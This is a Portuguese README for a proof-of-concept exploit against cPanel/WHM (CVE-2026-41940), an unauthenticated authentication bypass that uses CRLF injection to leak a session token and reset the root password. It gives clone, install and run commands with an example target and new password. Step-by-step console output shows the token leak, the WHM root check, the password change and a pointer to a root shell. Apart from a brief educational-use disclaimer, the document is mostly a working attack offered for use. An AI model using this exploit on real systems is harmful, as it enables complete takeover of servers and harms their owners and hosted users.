
Prova de conceito de exploit para CVE-2026-41940, uma bypass de autenticação não autenticada no cPanel/WHM usando injeção CRLF para vazar tokens de segurança e redefinir a senha do root.
CVE-2026-41940 é uma prova de conceito (PoC) de exploração direcionada ao cPanel/WHM.
Esta exploração demonstra um desvio de autenticação não autenticado usando injeção CRLF para vazar tokens de segurança e obter acesso de nível root à interface WHM, permitindo ações como alterar a senha do root.
Aviso: Esta PoC é apenas para fins educacionais. Não use em sistemas sem permissão.
cp_security_token.requests.git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
Requisitos:
requests,urllib3
python3 CVE_2026_41940.py --target <URL_ALVO> --password <NOVA_SENHA>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
O console mostra:
[0-4][+][!][*]Exemplo:
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| Flag | Descrição | Obrigatório | Padrão |
|---|
--target | URL alvo do WHM (ex.: https://host:2087) | Sim | - |
--password | Nova senha para o usuário root | Sim | - |
--hostname | Substituir cabeçalho Host: | Não | Auto |